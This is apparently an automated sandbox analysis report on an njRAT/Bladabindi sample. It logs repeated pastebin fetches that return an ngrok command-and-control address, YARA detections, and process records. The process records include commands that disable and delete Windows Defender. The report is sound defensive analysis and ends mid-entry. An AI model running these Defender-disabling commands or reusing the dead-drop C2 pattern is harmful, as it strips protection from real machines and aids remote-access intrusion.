Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:03:54 UTC	74	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-05-02 04:03:55 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:03:55 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 168 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51fcdcec1c46b-EWR
2024-05-02 04:03:55 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:03:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49821	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:03:58 UTC	74	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-05-02 04:03:59 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:03:59 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 172 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51fe68b8b729b-EWR
2024-05-02 04:03:59 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:03:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49823	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:04:03 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:04:03 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:04:03 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 176 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d5200269bf18c4-EWR
2024-05-02 04:04:03 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:04:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49825	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:04:07 UTC	74	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-05-02 04:04:07 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:04:07 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 180 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d5201c2e2a440d-EWR
2024-05-02 04:04:07 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:04:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49827	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:04:11 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:04:11 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:04:11 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 184 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d520344a2442da-EWR
2024-05-02 04:04:11 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:04:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49829	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:04:15 UTC	74	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-05-02 04:04:15 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:04:15 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 188 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d5204c2a420dc7-EWR
2024-05-02 04:04:15 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:04:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49831	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:04:19 UTC	74	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-05-02 04:04:19 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:04:19 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 192 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d520653fb978d6-EWR
2024-05-02 04:04:19 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:04:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49833	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:04:23 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:04:23 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:04:23 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 196 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d5207d2e104372-EWR
2024-05-02 04:04:23 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:04:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49835	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:04:26 UTC	74	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-05-02 04:04:26 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:04:26 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 199 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d52094491b0f84-EWR
2024-05-02 04:04:26 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:04:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49837	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:04:30 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:04:30 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:04:30 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 203 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d520ab7e5d4304-EWR
2024-05-02 04:04:30 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:04:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49839	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:04:34 UTC	74	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-05-02 04:04:34 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:04:34 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 207 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d520c51eea4393-EWR
2024-05-02 04:04:34 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:04:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49841	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:04:38 UTC	74	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-05-02 04:04:38 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:04:38 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 211 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d520ddeee08c8d-EWR
2024-05-02 04:04:38 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:04:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49843	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:04:42 UTC	74	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-05-02 04:04:42 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:04:42 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 215 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d520f4789b7cf0-EWR
2024-05-02 04:04:42 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:04:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49845	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:04:45 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:04:45 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:04:45 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 218 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d5210b2cf24234-EWR
2024-05-02 04:04:45 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:04:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49847	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:04:49 UTC	74	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-05-02 04:04:49 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:04:49 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 222 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d52121595c43b5-EWR
2024-05-02 04:04:49 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:04:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49849	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:04:52 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:04:53 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:04:53 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 226 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d5213769da15cb-EWR
2024-05-02 04:04:53 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:04:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49851	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:04:56 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:04:56 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:04:56 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 229 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d5214d7e5c424c-EWR
2024-05-02 04:04:56 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:04:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.4	49853	104.20.3.235	443

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:04:59 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:05:00 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:05:00 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 233 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d521639fcb428f-EWR
2024-05-02 04:05:00 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:05:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	06:00:51
Start date:	02/05/2024
Path:	C:\Users\user\Desktop\G1lnGpOLK4.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\G1lnGpOLK4.exe"
Imagebase:	0x960000
File size:	68'951 bytes
MD5 hash:	97D72EFBB1F6FEA3F158B136C330689D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: njrat1, Description: Identify njRat, Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: RevengeRAT_Sep17, Description: Detects RevengeRAT malware, Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: Andromeda_MalBot_Jun_1A, Description: Detects a malicious Worm Andromeda / RETADUP, Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: Unknown_Malware_Sample_Jul17_2, Description: Detects unknown malware sample with pastebin RAW URL, Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: njrat1, Description: Identify njRat, Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	06:00:56
Start date:	02/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	06:00:56
Start date:	02/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2036,i,13697505174205213952,6185066048164698462,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	06:00:58
Start date:	02/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Imagebase:	0x7ff727de0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:00:58
Start date:	02/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:00:58
Start date:	02/05/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableRealtimeMonitoring $true
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:01:03
Start date:	02/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c sc query windefend
Imagebase:	0x7ff727de0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:01:03
Start date:	02/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:01:04
Start date:	02/05/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc query windefend
Imagebase:	0x7ff653820000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:01:04
Start date:	02/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c sc stop windefend
Imagebase:	0x7ff727de0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	06:01:04
Start date:	02/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:01:04
Start date:	02/05/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop windefend
Imagebase:	0x7ff653820000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	06:01:04
Start date:	02/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c sc delete windefend
Imagebase:	0x7ff727de0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:01:04
Start date:	02/05/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	06:01:04
Start date:	02/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	06:01:04
Start date:	02/05/2024
Path:	C:\Windows\System32\sc.exe
